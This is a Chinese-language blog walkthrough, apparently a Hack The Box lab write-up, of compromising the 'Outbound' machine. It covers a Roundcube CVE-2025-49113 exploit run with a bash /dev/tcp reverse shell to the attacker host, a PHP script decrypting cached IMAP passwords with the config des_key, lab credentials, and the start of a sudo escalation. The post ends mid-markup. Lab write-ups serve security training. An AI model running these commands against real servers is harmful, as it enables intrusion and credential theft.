{"id":318,"date":"2025-07-19T11:16:39","date_gmt":"2025-07-19T03:16:39","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=318"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"318","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/07\/19\/318\/","title":{"rendered":"HTB\u9776\u673a Outbound \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.129.103.139<\/strong><\/code><strong>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p>\n<p><strong>\u63d0\u4f9b\u51ed\u636e\uff1a<code>tyler \/ LhKL1o9Nm3X2<\/code><\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.103.139 (10.129.103.139) 56(84) bytes of data.\n64 bytes from 10.129.103.139: icmp_seq=1 ttl=63 time=284 ms\n64 bytes from 10.129.103.139: icmp_seq=2 ttl=63 time=282 ms\n64 bytes from 10.129.103.139: icmp_seq=3 ttl=63 time=296 ms\n64 bytes from 10.129.103.139: icmp_seq=4 ttl=63 time=268 ms\n\n--- 10.129.103.139 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 268.047\/282.326\/295.807\/9.859 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u901a\u4fe1\u72b6\u6001\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul 13 07:19:12 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.103.139\nWarning: 10.129.103.139 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.139\nHost is up (0.21s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Sun Jul 13 07:19:46 2025 -- 1 IP address (1 host up) scanned in 33.76 seconds<\/code><\/pre>\n<p>\u9776\u673a\u7591\u4f3c\u5f00\u653e\u4e86<code>22\/ssh<\/code>\u548c<code>80\/http<\/code>\u4e24\u4e2a\u7aef\u53e3\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul 13 07:24:38 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.103.139\nWarning: 10.129.103.139 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.139\nHost is up (0.23s latency).\nNot shown: 64557 closed tcp ports (conn-refused), 976 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)\n|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)\n80\/tcp open  http    nginx 1.24.0 (Ubuntu)\n|_http-server-header: nginx\/1.24.0 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/mail.outbound.htb\/\nDevice type: general purpose|router\nRunning: Linux 4.X|5.X, MikroTik RouterOS 7.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5 cpe:\/o:mikrotik:routeros:7 cpe:\/o:linux:linux_kernel:5.6.3\nOS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   241.37 ms 10.10.14.1\n2   241.54 ms 10.129.103.139\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jul 13 07:25:30 2025 -- 1 IP address (1 host up) scanned in 52.45 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jul 13 07:26:28 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.103.139\nWarning: 10.129.103.139 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.139\nHost is up (0.21s latency).\nAll 65535 scanned ports on 10.129.103.139 are in ignored states.\nNot shown: 65290 open|filtered udp ports (no-response), 245 closed udp ports (port-unreach)\n\n# Nmap done at Sun Jul 13 07:30:30 2025 -- 1 IP address (1 host up) scanned in 241.67 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Ubuntu Linux<\/code>\uff0c\u5f00\u542f\u4e86<code>SSH<\/code>\u548c<code>Nginx HTTP<\/code>\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u4e3a<code>outbound.htb<\/code>\uff0c\u5b58\u5728<code>Web<\/code>\u865a\u62df\u4e3b\u673a\u540d<code>mail<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>ssh<\/code>\u8fde\u63a5\u9776\u673a\uff0c\u53d1\u73b0\u9776\u673a<code>SSH<\/code>\u670d\u52a1\u5141\u8bb8\u4f7f\u7528\u5bc6\u94a5\u548c\u5bc6\u7801\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752363441641-137c65ad-e015-4761-b9cd-6a6fb13bba9d.png\" alt=\"\" \/><\/p>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/mail.outbound.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752367636301-3d2ae93e-4f23-40a2-95a1-768dd19b0286.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5<code>Web<\/code>\u670d\u52a1\u90e8\u7f72\u4e86<code>Roundcube Webmail<\/code>\u5728\u7ebf\u90ae\u4ef6\u6536\u53d1\u7cfb\u7edf\u3002\u5c1d\u8bd5\u4f7f\u7528\u9898\u76ee\u63d0\u4f9b\u7684\u51ed\u636e\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752368184347-61db450d-4733-46d9-b014-c5e5703c206d.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>Roundcube<\/code>\u7248\u672c\u4e3a<code>v1.6.10<\/code>\uff0c\u5c1d\u8bd5\u8054\u7f51\u67e5\u627e\u5df2\u77e5\u6f0f\u6d1e\uff0c\u6210\u529f\u53d1\u73b0\u5b58\u5728\u6388\u6743\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2025-49113<\/code>\uff1a<a href=\"https:\/\/github.com\/hakaioffsec\/CVE-2025-49113-exploit\" target=\"_blank\"  rel=\"nofollow\" >GitHub - hakaioffsec\/CVE-2025-49113-exploit: Proof of Concept demonstrating Remote Code Execution through insecure deserialization in Roundcube (CVE-2025-49113).<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752368808698-5b633bc8-cb56-4219-bf8c-d726b34a95be.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>Roundcube RCE\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728<code>Web<\/code>\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u6210\u529f\u53d1\u73b0\u9776\u673a<code>HTTP<\/code>\u670d\u52a1\u90e8\u7f72\u4e86<code>Roundcube Webmail<\/code>\u90ae\u4ef6\u7cfb\u7edf\uff0c\u7248\u672c\u4e3a<code>v1.6.10<\/code>\uff0c\u5b58\u5728\u6388\u6743\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e<code>CVE-2025-49113<\/code>\uff0c\u73b0\u5728\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\uff0c\u4f7f\u7528<code>git clone<\/code>\u4e0b\u8f7d<code>EXP<\/code>\u4ee3\u7801\uff1a<\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/hakaioffsec\/CVE-2025-49113-exploit.git<\/code><\/pre>\n<p>\u968f\u540e\u5728\u672c\u5730\u542f\u52a8<code>netcat<\/code>\u76d1\u542c\uff0c\u7aef\u53e3\u4e3a<code>443<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">rlwrap nc -l -p 443 -s 10.10.14.2<\/code><\/pre>\n<p>\u6700\u540e\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u53cd\u5f39<code>Shell<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">php .\/CVE-2025-49113-exploit\/CVE-2025-49113.php http:\/\/mail.outbound.htb tyler \"LhKL1o9Nm3X2\" \"\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.2\/443 0&gt;&amp;1'\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752369414707-33bc7bec-78ac-43d3-8b1c-0ed7f1d869b7.png\" alt=\"\" \/><\/p>\n<p><strong>\u53cd\u5f39Shell\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u8fdb\u5165\u9776\u673a\u540e\uff0c\u6267\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u3002\u9996\u5148\uff0c\u5728<code>Web<\/code>\u5e94\u7528\u76ee\u5f55<code>\/var\/www\/html\/roundcube\/config\/<\/code>\u5185\u627e\u5230\u4e09\u4efd<code>Roundcube<\/code>\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lA \/var\/www\/html\/roundcube\/config\/<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752393394145-a5f62d86-d41f-4d7b-a340-e98e97c6574a.png\" alt=\"\" \/><\/p>\n<p>\u9996\u5148\u67e5\u770b<code>config.inc.php<\/code>\u6587\u4ef6\uff0c\u6210\u529f\u53d1\u73b0\u4e86<code>MySQL<\/code>\u8fde\u63a5\u51ed\u636e\uff1a<\/p>\n<pre><code class=\"language-php\">$config['db_dsnw'] = 'mysql:\/\/roundcube:RCDBPass2025@localhost\/roundcube';<\/code><\/pre>\n<ul>\n<li>\u4e3b\u673a\uff1a\u672c\u5730\u8ba1\u7b97\u673a<\/li>\n<li>\u7aef\u53e3\uff1a<code>3306<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>roundcube<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>RCDBPass2025<\/code><\/li>\n<\/ul>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u53d1\u73b0\u4e86\u4e00\u4e2a\u9ad8\u5ea6\u7591\u4f3c<code>DES<\/code>\u52a0\u5bc6\u5bc6\u94a5\u7684\u914d\u7f6e\u9879<code>des_key<\/code>\uff0c\u914d\u7f6e\u6587\u4ef6\u5185\u7684\u6ce8\u91ca\u79f0\uff0c\u8be5\u914d\u7f6e\u9879\u5b9a\u4e49\u4e86\u4e00\u4e2a<code>DES<\/code>\u5bc6\u94a5\uff0c\u7528\u4e8e\u5bf9\u4fdd\u5b58\u5728<code>session<\/code>\u6570\u636e\u8868\u4e2d\u7684<code>IMAP<\/code>\u767b\u5f55\u5bc6\u7801\u8fdb\u884c\u52a0\u5bc6\uff1a<\/p>\n<pre><code class=\"language-php\">\/\/ This key is used to encrypt the users imap password which is stored\n\/\/ in the session record. For the default cipher method it must be\n\/\/ exactly 24 characters long.\n\/\/ YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS\n$config['des_key'] = 'rcmail-!24ByteDESkey*Str';<\/code><\/pre>\n<ul>\n<li><code>DES<\/code>\u52a0\u5bc6\u5bc6\u94a5\uff1a<code>rcmail-!24ByteDESkey*Str<\/code><\/li>\n<\/ul>\n<p>\u4f46\u8be5\u914d\u7f6e\u6587\u4ef6\u5e76\u672a\u7ed9\u51fa\u5177\u4f53\u7684\u52a0\u5bc6\u7b97\u6cd5\u540d\u79f0\uff0c\u76f4\u63a5\u7ffb\u770b\u53e6\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6<code>defaults.inc.php<\/code>\uff1a<\/p>\n<pre><code class=\"language-php\">\/\/ Encryption algorithm. You can use any method supported by OpenSSL.\n\/\/ Default is set for backward compatibility to DES-EDE3-CBC,\n\/\/ but you can choose e.g. AES-256-CBC which we consider a better choice.\n$config['cipher_method'] = 'DES-EDE3-CBC';<\/code><\/pre>\n<p>\u6210\u529f\u627e\u5230\u914d\u7f6e\u9879<code>cipher_method<\/code>\uff0c\u8be5\u914d\u7f6e\u5b9a\u4e49\u4e86<code>Roundcube<\/code>\u5bf9\u7f13\u5b58\u7684<code>IMAP<\/code>\u5bc6\u7801\u7684\u52a0\u5bc6\u65b9\u5f0f\u4e3a<code>DES-EDE3-CBC<\/code>\uff01<\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u5728\u6839\u76ee\u5f55\u4e0b\u53d1\u73b0\u4e86<code>.dockerenv<\/code>\u6587\u4ef6\uff0c\u786e\u5b9a\u5f53\u524d\u73af\u5883\u4e3a<code>Docker<\/code>\u5bb9\u5668\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394279215-2cea5d22-4f64-4cca-a2b2-20c47f56a240.png\" alt=\"\" \/><\/p>\n<h2>\u6570\u636e\u5e93\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u5728\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u5f97\u5230\u4e86<code>MySQL<\/code>\u6570\u636e\u5e93\u51ed\u636e\uff0c\u73b0\u5728\u767b\u5f55\u6570\u636e\u5e93\u8fdb\u4e00\u6b65\u6536\u96c6\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">mysql -u roundcube -p\"RCDBPass2025\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394357579-45ff65e8-47c5-4973-9d9c-4aeb01ec7ef5.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>roundcube<\/code>\u7528\u6237\u4e0b\u53ea\u6709\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u8f6c\u5230\u8be5\u6570\u636e\u5e93\u4e0b\uff0c\u5217\u51fa\u6570\u636e\u8868\uff1a<\/p>\n<pre><code class=\"language-plsql\">use roundcube\nshow tables;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394519460-24dfe20f-0448-432e-a9e4-7abba3c9095e.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u6570\u636e\u5e93\u5185\u5b58\u5728<code>session<\/code>\u8868\uff0c\u5c1d\u8bd5\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-plsql\">select * from session;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752394810470-2fbdf378-0571-427f-92ab-0aa25021f345.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u5927\u6bb5<code>Base64<\/code>\u6587\u672c\uff0c\u89e3\u7801\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-plain\">language|s:5:\"en_US\";imap_namespace|a:4:{s:8:\"personal\";a:1:{i:0;a:2:{i:0;s:0:\"\";i:1;s:1:\"\/\";}}s:5:\"other\";N;s:6:\"shared\";N;s:10:\"prefix_out\";s:0:\"\";}imap_delimiter|s:1:\"\/\";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:\"jacob\";storage_host|s:9:\"localhost\";storage_port|i:143;storage_ssl|b:0;password|s:32:\"L7Rv00A8TuwJAr67kITxxcSgnIk25Am\/\";login_time|i:1749397119;timezone|s:13:\"Europe\/London\";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:\"DpYqv6maI9HxDL5GhcCd8JaQQW\";request_token|s:32:\"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw\";task|s:4:\"mail\";skin_config|a:7:{s:17:\"supported_layouts\";a:1:{i:0;s:10:\"widescreen\";}s:22:\"jquery_ui_colors_theme\";s:9:\"bootstrap\";s:18:\"embed_css_location\";s:17:\"\/styles\/embed.css\";s:19:\"editor_css_location\";s:17:\"\/styles\/embed.css\";s:17:\"dark_mode_support\";b:1;s:26:\"media_browser_css_location\";s:4:\"none\";s:21:\"additional_logo_types\";a:3:{i:0;s:4:\"dark\";i:1;s:5:\"small\";i:2;s:10:\"small-dark\";}}imap_host|s:9:\"localhost\";page|i:1;mbox|s:5:\"INBOX\";sort_col|s:0:\"\";sort_order|s:4:\"DESC\";STORAGE_THREAD|a:3:{i:0;s:10:\"REFERENCES\";i:1;s:4:\"REFS\";i:2;s:14:\"ORDEREDSUBJECT\";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:\"name\";s:8:\"messages\";s:2:\"id\";s:11:\"messagelist\";s:5:\"class\";s:42:\"listing messagelist sortheader fixedheader\";s:15:\"aria-labelledby\";s:22:\"aria-label-messagelist\";s:9:\"data-list\";s:12:\"message_list\";s:14:\"data-label-msg\";s:18:\"The list is empty.\";}unseen_count|a:2:{s:5:\"INBOX\";i:2;s:5:\"Trash\";i:0;}folders|a:1:{s:5:\"INBOX\";a:2:{s:3:\"cnt\";i:2;s:6:\"maxuid\";i:3;}}list_mod_seq|s:2:\"10\";<\/code><\/pre>\n<p>\u53d1\u73b0\u4e3a\u4e00\u4e9b<code>PHP<\/code>\u5bf9\u8c61\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e32\u6570\u636e\uff0c\u4f3c\u4e4e\u662f<code>Roundcube<\/code>\u7528\u6237\u5bf9\u8c61\u7684\u4fe1\u606f\u3002\u4ed4\u7ec6\u9605\u8bfb\uff0c\u6210\u529f\u53d1\u73b0\u4e86\u7528\u6237\u540d<code>jacob<\/code>\u548c\u52a0\u5bc6\u7684\u5bc6\u7801<code>L7Rv00A8TuwJAr67kITxxcSgnIk25Am\/<\/code>\u3002<\/p>\n<h2>\u89e3\u5bc6Roundcube\u7f13\u5b58\u90ae\u7bb1\u5bc6\u7801<\/h2>\n<p>\u5728\u4e4b\u524d\u7684\u76ee\u5f55\u548c\u6570\u636e\u5e93\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u6210\u529f\u53d1\u73b0\u4e86<code>Roundcube<\/code>\u5728\u6570\u636e\u5e93\u4e2d\u7f13\u5b58\u7684\u52a0\u5bc6<code>IMAP<\/code>\u8fde\u63a5\u5bc6\u7801\uff0c\u53ca\u5176\u52a0\u5bc6\u65b9\u5f0f\u548c\u5bc6\u94a5\uff0c\u73b0\u5728\u5c1d\u8bd5\u8054\u7f51\u67e5\u627e\u65b9\u6cd5\u8fdb\u884c\u89e3\u5bc6\u3002<\/p>\n<p>\u5728\u8c37\u6b4c\u4e2d\u8f93\u5165<code>decrypt roundcube session password<\/code>\u5173\u952e\u8bcd\uff0c\u70b9\u51fb\u641c\u7d22\uff0c\u7b2c\u4e00\u6761\u7ed3\u679c\u4e3a<code>Roundcube<\/code>\u793e\u533a\u5185\u7684\u4e00\u7bc7\u5e16\u5b50\uff0c\u76f4\u63a5\u8fdb\u5165\uff1a<a href=\"https:\/\/www.roundcubeforum.net\/index.php?topic=23399.0\" target=\"_blank\"  rel=\"nofollow\" >Decrypt password from session-vars<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752395417286-6550d28c-d3da-408e-b60f-15da519de891.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5e16\u4e3b\u53d1\u5e16\u8be2\u95ee\u5982\u4f55\u5bf9\u6570\u636e\u5e93\u4e2d\u7f13\u5b58\u7684\u52a0\u5bc6\u51ed\u636e\u8fdb\u884c\u89e3\u5bc6\uff0c\u800c\u4e00\u540d\u7528\u6237\u56de\u7b54\u79f0\uff0c<code>Roundcube<\/code>\u5bf9\u8be5\u51ed\u636e\u8fdb\u884c\u89e3\u5bc6\u7684\u4ee3\u7801\u53ef\u5728<code>GitHub<\/code>\u4e2d\u67e5\u9605\uff0c\u8fd8\u7ed9\u51fa\u4e86\u94fe\u63a5\uff0c\u4e0d\u96be\u53d1\u73b0\u94fe\u63a5\u6307\u5411\u7684\u662f<code>rcube.php<\/code>\u6587\u4ef6\u3002<\/p>\n<p>\u76f4\u63a5\u70b9\u51fb\u94fe\u63a5\u8df3\u8f6c\u81f3<code>GitHub<\/code>\uff0c\u7ffb\u9605\u4ee3\u7801\uff0c\u53d1\u73b0\u89e3\u5bc6\u51fd\u6570\u4e3a<code>decrypt()<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752396708565-a58996bd-2715-4405-bfe1-62024c694a3c.png\" alt=\"\" \/><\/p>\n<p>\u5c06\u8be5\u51fd\u6570\u4ee3\u7801\u590d\u5236\u5230\u6587\u672c\u7f16\u8f91\u5668\u4e2d\uff0c\u4fee\u6539\u53d8\u91cf<code>ckey<\/code>\u548c<code>method<\/code>\uff0c\u5c06\u5176\u66ff\u6362\u4e3a\u5728<code>Roundcube<\/code>\u914d\u7f6e\u6587\u4ef6\u4e2d\u627e\u5230\u7684\u5bc6\u94a5\u548c\u52a0\u5bc6\u65b9\u6cd5\uff0c\u968f\u540e\u8c03\u7528\u8be5\u51fd\u6570\uff0c\u53c2\u6570\u8bbe\u7f6e\u4e3a\u6570\u636e\u5e93\u4e2d\u627e\u5230\u7684<code>IMAP<\/code>\u7f13\u5b58\u52a0\u5bc6\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\nfunction decrypt($cipher, $key = 'des_key', $base64 = true)\n    {\n        if (!is_string($cipher) || !strlen($cipher)) {\n            return false;\n        }\n\n        if ($base64) {\n            $cipher = base64_decode($cipher);\n            if ($cipher === false) {\n                return false;\n            }\n        }\n\n        $ckey    = \"rcmail-!24ByteDESkey*Str\";\n        $method  = \"DES-EDE3-CBC\";\n        $iv_size = openssl_cipher_iv_length($method);\n        $tag     = null;\n\n        if (preg_match('\/^##(.{16})##\/s', $cipher, $matches)) {\n            $tag    = $matches[1];\n            $cipher = substr($cipher, strlen($matches[0]));\n        }\n\n        $iv = substr($cipher, 0, $iv_size);\n\n        if (strlen($iv) &lt; $iv_size) {\n            return false;\n        }\n\n        $cipher = substr($cipher, $iv_size);\n        $clear  = openssl_decrypt($cipher, $method, $ckey, OPENSSL_RAW_DATA, $iv, $tag);\n\n        return $clear;\n    }\n\n    var_dump(decrypt(\"L7Rv00A8TuwJAr67kITxxcSgnIk25Am\/\"));\n?&gt;<\/code><\/pre>\n<p>\u76f4\u63a5\u8fd0\u884c\uff1a<\/p>\n<pre><code class=\"language-shell\">php .\/decrypt_pass.php<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752397020649-e92fb57f-2b82-4656-bb10-217cbb5b34b4.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u5f97<code>Roundcube<\/code>\u548c<code>Docker<\/code>\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>jacob<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>595mO8DmwGeD<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u767b\u5f55<code>Roundcube<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752397299058-70c0b141-33fc-4e2e-9b31-37b9b105e3e7.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u6536\u4ef6\u7bb1\u5185\u5b58\u5728\u4e24\u5c01\u90ae\u4ef6\uff1a<\/p>\n<pre><code class=\"language-plain\">========== Unexpected Resource Consumption (From: mel@outbound.htb)\nWe have been experiencing high resource consumption on our main server.\nFor now we have enabled resource monitoring with Below and have granted you privileges to inspect the the logs.\nPlease inform us immediately if you notice any irregularities.\n\nThanks!\n\nMel\n========== Important Update (From:  tyler@outbound.htb)\nDue to the recent change of policies your password has been changed.\nPlease use the following credentials to log into your account: gY4Wr3a1evp4\nRemember to change your password when you next log into your account.\n\nThanks!\n\nTyler<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u64cd\u4f5c\u7cfb\u7edf\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>jacob<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>gY4Wr3a1evp4<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u767b\u5f55<code>SSH<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh jacob@outbound.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752397724270-3cbc41c9-4e64-4a36-998b-628cfae7099a.png\" alt=\"\" \/><\/p>\n<h2>Sudo\u7a0b\u5e8f\u6f0f\u6d1e\u5229\u7528\u63d0\u6743<\/h2>\n<p>\u767b\u5f55<code>jacob<\/code>\u7528\u6237\u540e\uff0c\u5c1d\u8bd5\u6267\u884c<code>sudo -l<\/code>\u547d\u4ee4\u5217\u51fa\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u4fe1\u606f\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752891702915-ecdf5f57-1691-4b47-968b-1a295f7c10bb.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5f53\u524d\u7528\u6237\u53ef\u4ee5\u4ee5\u4efb\u610f\u7528\u6237\u8eab\u4efd\u514d\u5bc6\u6267\u884c<code>\/usr\/bin\/below<\/code>\u7a0b\u5e8f\u3002\u6267\u884c\u547d\u4ee4\u67e5\u770b\u7a0b\u5e8f\u5177\u4f53\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">file \/usr\/bin\/below\nbelow --help<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752891819308-db7a8a88-1b83-4017-b0de-fa4bb8b30519.png\" alt=\"\" \/><\/p>\n<p>\u6839\u636e\u7a0b\u5e8f\u5e2e\u52a9\u4fe1\u606f\uff0c\u5c1d\u8bd5\u6267\u884c<code>below live<\/code>\u547d\u4ee4\uff0c\u4ee5\u786e\u5b9a\u8be5\u7a0b\u5e8f\u7684\u5177\u4f53\u529f\u80fd\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1752891900709-28c9e3f4-f239-439e-9ad3-4e73e09b5596.png\" alt=\"\" 